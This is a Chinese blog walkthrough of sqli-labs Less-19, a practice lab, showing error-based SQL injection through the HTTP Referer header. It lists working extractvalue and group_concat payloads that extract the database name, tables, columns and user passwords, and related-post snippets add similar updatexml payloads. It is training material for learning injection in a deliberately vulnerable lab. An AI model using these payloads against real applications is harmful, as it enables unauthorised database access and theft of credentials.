sqli-labs第十九关详解

最新推荐文章于 2025-07-13 18:06:17 发布
原创 最新推荐文章于 2025-07-13 18:06:17 发布 · 2.9k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入 #CTF

博客内容涉及SQL注入攻击的原理与利用,通过HTTP Referer进行注入,展示了如何利用extractvalue和group_concat函数获取数据库名、表名、字段及数据。由于报错回显限制,采用mid函数进行字符串截断,逐步揭示完整信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先看一下源码,发现跟上一关的差别不太大,只有两处地方不太一样,

第一处的$uagent的值

该值是http请求头Referer的值,所以注入点就为http的Referer了

第二处是第二个SQL语句,一样用的是报错注入

所以在利用$uagent进行注入的时候,payload应该这样闭合

1',sql语句)# 

所以先用burpsuite抓包,构造payload,查看一下数据库名

1',extractvalue(1,concat(0x5e,database())))#

 

接着爆表,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema = database()))))#

 接着爆字段,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'))))#

接着查看值,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(password) from users))))#

由于报错回显最多32位字符串,所以导致了回显不全的问题,我们可以利用字符串截断函数进行截断回显,这里我们使用mid函数,截断查询语句,从第32位开始查看回显31位字符串,也就是mid(SQL语句,32,31)

为了查看剩下的密码,接着我们构造payload

1',extractvalue(1,concat(0x5e,mid((select group_concat(password) from users),32,31))))#

继续查看后续的密码,构造payload

1',extractvalue(1,concat(0x5e,mid((select group_concat(password) from users),64,31))))#

可以观察到,回显完了,继续截断也不会回显了,将上面的字符串连接起来就能得到完整的密码了

sqli-labs18、19详解
weixin_43061418的博客
09-01 2190
18 对两个输入框都进行了设置,所以只能寻找其他注入点 看到insert语句从uagents插入 我们可以 19 可以看到将uname放在了referer里面 就像18那样去修改Referer里面的就好了
Sqli-labs靶场第19详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 920
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
sqli-labs19
jimggg的博客
03-20 336
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
sqli-labs第十九
最新发布
fristchoice的博客
07-13 294
摘要:本文详细介绍了SQL注入攻击的五个步骤:1)通过抓包分析发现注入点;2)获取数据库名称;3)获取表名;4)查看表列结构;5)最终获取敏感数据。作者使用sqlmap工具结合报错注入技术,通过修改referer头进行闭合测试,最终成功获取数据库中的用户名和密码等键信息。文章展示了完整的SQL注入流程,包括利用updatexml函数进行报错注入的具体方法。
Sqlilabs-19
KAKA的博客
07-09 414
19 跟第 18 类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs靶场第十九
gou1791241251的博客
12-30 1133
这一注入点不着账号和密码,在http头部中的referer字段。可以尝试一下输入单引号和双引号进行测试。 注意哈,前提是需要账号密码正确输入的情况下才能注入成功,因为后台会先校验账号密码是否能够查询出结果才会执行referer字段的插入操作。 由图可知啊,输入单引号时页面显示了报错信息,闭合方式为单引号闭合,此时可以使用报错注入。 ',updatexml(1,concat(0x3a,database(),0x3a),1))# 成功爆库。XPATH语法错误。 ...
SQLilabs的第19——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 517
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9201
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
sqli-labssqli-labs 靶场通(1-16)
m0_71944965的博客
09-02 716
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】sqli-labs 靶场通(1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
Sqli-labs-master靶场之1-21秘籍
m0_66241651的博客
07-03 951
此靶场就是让我们掌握sql注入的基本方法,通秘籍来了,轻轻松松搞定!
sqli-labs小游戏(1-20)详解
weixin_51356351的博客
10-22 1039
第一 第一是联合查询注入 判断注入----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 http://localhost/sqli-labs-master/Less-1/?id=1’ – - http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- - http://localhost/sqli-labs-master/Less-1/?id=1’
SQLI-labs-第十九和第二十
weixin_54055099的博客
05-20 637
Sqli-labs第十九和二十,http头部注入,referer、cookie注入
sqli-labs(19)
weixin_30615767的博客
05-27 151
百度了一下 基于错误的referer头的注入 0X01爱之初体验 猜测是基于referer头的注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
sqli-labs19
devilare的博客
01-19 367
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sql-labs靶场第十九测试报告
ccc_9wy的博客
10-19 1493
sql-labs第十九的测试报告;手工注入sqlmap两种方法;靶场源代码分析;详细过程;报错注入;请求头注入
sqli-labs19(基于http头部报错盲注)通思路
zyh1588的博客
11-18 1058
小白回顾sql靶场第19
SQLi LABS Less-19 报错注入
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlilibs19SQLI-LABS第十九sqli-labs十九 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
sqli-labs/Less-19
m0_71299382的博客
11-18 278
sqli-labs第十九
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值